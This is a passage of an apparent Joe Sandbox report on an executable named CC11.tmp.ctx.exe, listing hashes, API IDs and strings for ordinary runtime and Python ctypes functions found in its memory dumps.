                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_File_ObjectPrintStringSys_Write__stdio_common_vsprintf
                                                                                                                                                                  • String ID: stderr
                                                                                                                                                                  • API String ID: 3428540488-1769798200
                                                                                                                                                                  • Opcode ID: b85cdcbcb23bfeaac3917966d3ac98d52ea196867f0de5e8bdad10b2158e6464
                                                                                                                                                                  • Instruction ID: ac7831e58251dd5b0c947f43f9f9de7460d34d57c2d0d92651604bae9a8809a1
                                                                                                                                                                  • Opcode Fuzzy Hash: b85cdcbcb23bfeaac3917966d3ac98d52ea196867f0de5e8bdad10b2158e6464
                                                                                                                                                                  • Instruction Fuzzy Hash: E1014C62A29B8182EA608B94F8953A977A4FFD8B80F480135CB8D07356DF3CE155CB40
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_Long$Long_MaskOccurredStringUnsigned
                                                                                                                                                                  • String ID: cannot be converted to pointer
                                                                                                                                                                  • API String ID: 361506457-3065012988
                                                                                                                                                                  • Opcode ID: 9d78d1695ba62ee1ba72d204a46f331d9aac2d2020aa89fcc41fd74f633a5faa
                                                                                                                                                                  • Instruction ID: f62c2590884e23e79cf2e3fdfc7846c99241360aa872f4a937fcfb7ce0a60c3a
                                                                                                                                                                  • Opcode Fuzzy Hash: 9d78d1695ba62ee1ba72d204a46f331d9aac2d2020aa89fcc41fd74f633a5faa
                                                                                                                                                                  • Instruction Fuzzy Hash: 9301EC25A1EB4685EB548FDDE88437927B0BF88BC5F188131DB4D07765DE2CE498D300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Callable_CheckDeallocErr_String
                                                                                                                                                                  • String ID: the errcheck attribute must be callable
                                                                                                                                                                  • API String ID: 3907376375-3049503998
                                                                                                                                                                  • Opcode ID: 61656c79d6d346c1efe85635cb1e8023004125b6a61a1fa0cb11ab76b3daad86
                                                                                                                                                                  • Instruction ID: b9aae483b674401828b96c2826bf62e92ae74f2a90e84fde41577ae6b447fc59
                                                                                                                                                                  • Opcode Fuzzy Hash: 61656c79d6d346c1efe85635cb1e8023004125b6a61a1fa0cb11ab76b3daad86
                                                                                                                                                                  • Instruction Fuzzy Hash: 86F06232B0AA4691EB58AFADE99017867A0FF88FD4F14C130CB6D87665DF2CD454C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Err_$Long_OccurredStringVoid
                                                                                                                                                                  • String ID: integer expected
                                                                                                                                                                  • API String ID: 1621529885-2140524511
                                                                                                                                                                  • Opcode ID: d7e12a5a84ba3b5816ac9245441cbdfbdf4e16f5050b299c09b493440ede2c38
                                                                                                                                                                  • Instruction ID: 02f20f89c3e2a541b11cc061e7f4bb7de644fd4d0139b18c3547fe31c6ccedb6
                                                                                                                                                                  • Opcode Fuzzy Hash: d7e12a5a84ba3b5816ac9245441cbdfbdf4e16f5050b299c09b493440ede2c38
                                                                                                                                                                  • Instruction Fuzzy Hash: 18F05E21B0D74791EE049F9AE5442796760EF89FD4F589030DB4E07765DE2CD484C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • second item in _fields_ tuple (index %zd) must be a C type, xrefs: 00007FF8BFB77FB0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: DeallocErr_FormatFreeMem_
                                                                                                                                                                  • String ID: second item in _fields_ tuple (index %zd) must be a C type
                                                                                                                                                                  • API String ID: 3237669406-2717732800
                                                                                                                                                                  • Opcode ID: 005435b0ef9407ab09b5a462a8de8b0f0626b263dac59c8c198cb6ebb4c16b1b
                                                                                                                                                                  • Instruction ID: 7df786b68d22f7191e784126f28b0f73fc2a064b5b0c46593f9c1ffaeea398ae
                                                                                                                                                                  • Opcode Fuzzy Hash: 005435b0ef9407ab09b5a462a8de8b0f0626b263dac59c8c198cb6ebb4c16b1b
                                                                                                                                                                  • Instruction Fuzzy Hash: 4AE06224A0DA4391E614AFEDE8540782760AFC5FD5B104231DA1F476B5CF3CE549D305
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2718003287-0
                                                                                                                                                                  • Opcode ID: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
                                                                                                                                                                  • Instruction ID: c06975508efff32dfaf1af3e4da627690b783b6fe90eb2097004a056e7bc40af
                                                                                                                                                                  • Opcode Fuzzy Hash: 0739f85a4d911baae0561c1f2f5b651aa469f8b70ac1dc09fd50f765aaaafbc7
                                                                                                                                                                  • Instruction Fuzzy Hash: 67D1DF72B18A81A9E721CF79D4402AC37B2FB44B98B1442B6DE5E97B9DDE38D517C300
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69002C25B), ref: 00007FF69002C38C
                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF69002C25B), ref: 00007FF69002C417
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ConsoleErrorLastMode
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 953036326-0
                                                                                                                                                                  • Opcode ID: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
                                                                                                                                                                  • Instruction ID: 0219f2ecabbdaf2371d1ac489016fb3e55e351a4e53d8cb56e150af9cfcb5535
                                                                                                                                                                  • Opcode Fuzzy Hash: 76adbd728b317254a89cb4c791728419eb9f151af89ead0c9a06842c56e3605f
                                                                                                                                                                  • Instruction Fuzzy Hash: 2691B472E08651A5F770DF799450ABD2BA1FB44B88F544179DE0EA6B8DDF38E482C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Mem_$DeallocFreeMallocmemcpy
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1346496523-0
                                                                                                                                                                  • Opcode ID: cd1faa9cd6bc9fcf4481885c5218df6ea04b1359ee28e5919f622cf77473978f
                                                                                                                                                                  • Instruction ID: 9d5ee73b731fb598c62af2c2efccfd4232386547259b0b7cefaf08b4be10e194
                                                                                                                                                                  • Opcode Fuzzy Hash: cd1faa9cd6bc9fcf4481885c5218df6ea04b1359ee28e5919f622cf77473978f
                                                                                                                                                                  • Instruction Fuzzy Hash: 90216A62A09B4281EB699B9AE85017D27B1FF88FD0B048535DB5E07B99DF3CE461C740
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1956198572-0
                                                                                                                                                                  • Opcode ID: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                  • Instruction ID: 12af31a49459fafde35b0062c51bb97e609a924e083d0ae66dc763579da81dd5
                                                                                                                                                                  • Opcode Fuzzy Hash: 4b9e5de1fbcf843bc779a4d54dee57f94c26a540a6e6e96758728fc1cf1e39ca
                                                                                                                                                                  • Instruction Fuzzy Hash: 1711E521E0814252FAB69B7AE5442B91292EF8CB88F848171EA4D87B8FCD2CD4E18600
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Dealloc$Descr_Dict_ItemString
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 975051370-0
                                                                                                                                                                  • Opcode ID: d8a4eaa814511476155a84e271f8be3e0b3fe2d8030b4c9334b05d05d5822cab
                                                                                                                                                                  • Instruction ID: f3190647f5b0f6e32debc7355427a5bd94404543034cb806a70f47982dd364b6
                                                                                                                                                                  • Opcode Fuzzy Hash: d8a4eaa814511476155a84e271f8be3e0b3fe2d8030b4c9334b05d05d5822cab
                                                                                                                                                                  • Instruction Fuzzy Hash: 7B117C25A0EA42C5EF588F9AA94037A37A0EF89FD1F084130DF5E82799DF3CE0918700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Dealloc$CallDict_ItemMakeObject_ProxyWeakref_
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1512266493-0
                                                                                                                                                                  • Opcode ID: ee14201d288885dab2d3b72eca7127d67ec00b39f4c2a441eb93ece7867c3194
                                                                                                                                                                  • Instruction ID: 4628fe46c482dca55aed6a0d6da2e326aaf82ece30825d3e32b348f783669e95
                                                                                                                                                                  • Opcode Fuzzy Hash: ee14201d288885dab2d3b72eca7127d67ec00b39f4c2a441eb93ece7867c3194
                                                                                                                                                                  • Instruction Fuzzy Hash: 29114532A09B82C5EA549FAAA844179B7A8EB89BD4B184131DF5E4779ADE3CE441C700
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2933794660-0
                                                                                                                                                                  • Opcode ID: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                  • Instruction ID: 9ca3e75ac5f656dd08f6fd25b59cfb02fb4f2395cf019a7a4db2c09b25091ac1
                                                                                                                                                                  • Opcode Fuzzy Hash: 0f32e5fb6c1657f40c76225ea380b4ebd78bc5beffa0738dce661fe11625e8f4
                                                                                                                                                                  • Instruction Fuzzy Hash: D5111822B14B059AEB108B70E8542A933A4FB59758F441E31EA6D86BA8EF78D1988340
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2270544439.00007FF8BFB71000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8BFB70000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2270494572.00007FF8BFB70000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270597885.00007FF8BFB81000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270643604.00007FF8BFB88000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2270681731.00007FF8BFB8C000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff8bfb70000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: Object_memset$Track
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 225649448-0
                                                                                                                                                                  • Opcode ID: a786a447b7de81fdd416b21125803142f81c2d228cba119be79dd88451351a2b
                                                                                                                                                                  • Instruction ID: 866768cd7f74a315f5c2e604f5e9f495b70e6a546d1780a7ed0468bf3425cd02
                                                                                                                                                                  • Opcode Fuzzy Hash: a786a447b7de81fdd416b21125803142f81c2d228cba119be79dd88451351a2b
                                                                                                                                                                  • Instruction Fuzzy Hash: 5B015EA3A24B4583EB15DF6AD5453B833A1FB98B98F444239CB0C07696DF7CD988C340
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: ?
                                                                                                                                                                  • API String ID: 1286766494-1684325040
                                                                                                                                                                  • Opcode ID: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
                                                                                                                                                                  • Instruction ID: e1dcb3100f6a0f1517aa93ec2d3608b3295c3d7a10a76c201011125beb336e72
                                                                                                                                                                  • Opcode Fuzzy Hash: 30789dec6190b383a199f118b84c25ff7dc7ec79571e837530472d1d90a39620
                                                                                                                                                                  • Instruction Fuzzy Hash: 3241F612A0868266FF369B35D441B7A6790EF84BA4F144275EE5C8ABDDDF3CE481C700
                                                                                                                                                                  APIs
                                                                                                                                                                  • _invalid_parameter_noinfo.LIBCMT ref: 00007FF69002835E
                                                                                                                                                                    • Part of subcall function 00007FF690029C58: HeapFree.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C6E
                                                                                                                                                                    • Part of subcall function 00007FF690029C58: GetLastError.KERNEL32(?,?,?,00007FF690032032,?,?,?,00007FF69003206F,?,?,00000000,00007FF690032535,?,?,?,00007FF690032467), ref: 00007FF690029C78
                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF69001BEC5), ref: 00007FF69002837C
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: C:\Users\user\AppData\Local\Temp\CC11.tmp.ctx.exe
                                                                                                                                                                  • API String ID: 3580290477-991927476
                                                                                                                                                                  • Opcode ID: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
                                                                                                                                                                  • Instruction ID: 323837247eeec7fd44fbcaff1b2c024b14c6b0abaa7082e72304a3d6f93d6ce2
                                                                                                                                                                  • Opcode Fuzzy Hash: b12c586edd81a32e618353e8c6e47471c9321224668f8732ac6121a92b7f4d59
                                                                                                                                                                  • Instruction Fuzzy Hash: 9F417F3AA0DB56A6EB34DF39A4810FD2794EF45B94B554075EA4E87B8DDF3CE4828300
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CurrentDirectory_invalid_parameter_noinfo
                                                                                                                                                                  • String ID: .$:
                                                                                                                                                                  • API String ID: 2020911589-4202072812
                                                                                                                                                                  • Opcode ID: 73f54d41e2f65cec490ecc893310b0faf8beab10b95a0916934e12cbd7a72e3a
                                                                                                                                                                  • Instruction ID: 5a2d6bfc6d16ccbdcb5e4487e37e3528000c87e49f01a57fc38edfa98d1e5d95
                                                                                                                                                                  • Opcode Fuzzy Hash: 73f54d41e2f65cec490ecc893310b0faf8beab10b95a0916934e12cbd7a72e3a
                                                                                                                                                                  • Instruction Fuzzy Hash: 17414B22F08752A8FB21DBB998512BD26B4EF14798F540079DE4DA7B8DEF38D4878310
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
                                                                                                                                                                  • Associated: 00000010.00000002.2268366433.00007FF690010000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268657379.00007FF69003B000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF69004E000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268703064.00007FF690053000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  • Associated: 00000010.00000002.2268789682.00007FF690056000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_16_2_7ff690010000_CC11.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ErrorFileLastWrite
                                                                                                                                                                  • String ID: U
                                                                                                                                                                  • API String ID: 442123175-4171548499
                                                                                                                                                                  • Opcode ID: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
                                                                                                                                                                  • Instruction ID: 18226b86f7da60d0ba9c0e6db2c843782155f68460b394313a35138751256fd4
                                                                                                                                                                  • Opcode Fuzzy Hash: 8a697203ccd77e4b09c13c65c1c26094ec0dd1f28ad5eedaecdf6916cad97550
                                                                                                                                                                  • Instruction Fuzzy Hash: 1541B122A18A8595DB60CF39E8447A97761FB98794F904131EE4DC7B88EF7CD442CB40
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000010.00000002.2268589204.00007FF690011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF690010000, based on PE: true
